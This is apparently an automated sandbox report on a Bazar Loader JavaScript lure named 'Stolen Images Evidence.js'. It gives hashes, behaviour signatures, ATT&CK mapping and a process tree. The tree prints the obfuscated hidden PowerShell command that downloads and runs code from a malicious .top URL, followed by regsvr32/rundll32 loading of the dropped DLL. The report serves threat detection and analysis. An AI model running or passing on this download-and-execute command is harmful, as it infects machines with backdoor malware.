Analysis

  • max time kernel
    136s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 18:11

General

  • Target

    Stolen Images Evidence.js

  • Size

    19KB

  • MD5

    c62b322046bee6a5a86c4fecf5dee72e

  • SHA1

    18a381be8472fcee623c18cb1bfcf938682bef7d

  • SHA256

    edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01

  • SHA512

    2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: http://bobersok.top/333g100/index.php

Signatures

  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

  • Bazar/Team9 Loader payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:576
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
          4⤵
          • Loads dropped DLL
          PID:1680
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat,DllRegisterServer {749609AF-8C93-44BA-A2BA-C66B158CBE86}
    1⤵
    • Loads dropped DLL
    PID:1904

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
    MD5

    58d1d95824f5687dd9dc113def8ef0db

    SHA1

    4ccac5744e86ee05b09f40bfd1f9971e082eb5ae

    SHA256

    8a5e76f924b8dca3d5e34b86289a9195f705ec7072cd527071951a512c85e825

    SHA512

    50713dd2c2ca693836b582ac12e396c3f5bd552b41b7dca6bd128cac4c1fbe281f2b3f58256daca80c7784c9307d0954496415b1e1a74b79601250e374428951

  • \Users\Admin\AppData\Local\Temp\FHbKnfj.dat
    MD5

    58d1d95824f5687dd9dc113def8ef0db

    SHA1

    4ccac5744e86ee05b09f40bfd1f9971e082eb5ae

    SHA256

    8a5e76f924b8dca3d5e34b86289a9195f705ec7072cd527071951a512c85e825

    SHA512

    50713dd2c2ca693836b582ac12e396c3f5bd552b41b7dca6bd128cac4c1fbe281f2b3f58256daca80c7784c9307d0954496415b1e1a74b79601250e374428951

  • memory/576-58-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp
    Filesize

    11.4MB

  • memory/576-60-0x00000000023B2000-0x00000000023B4000-memory.dmp
    Filesize

    8KB

  • memory/576-59-0x00000000023B0000-0x00000000023B2000-memory.dmp
    Filesize

    8KB

  • memory/576-61-0x00000000023B4000-0x00000000023B7000-memory.dmp
    Filesize

    12KB

  • memory/576-62-0x00000000023BB000-0x00000000023DA000-memory.dmp
    Filesize

    124KB

  • memory/576-56-0x0000000000000000-mapping.dmp
  • memory/1116-54-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp
    Filesize

    8KB

  • memory/1372-55-0x0000000000000000-mapping.dmp
  • memory/1680-63-0x0000000000000000-mapping.dmp
  • memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp
    Filesize

    160KB

  • memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp
    Filesize

    160KB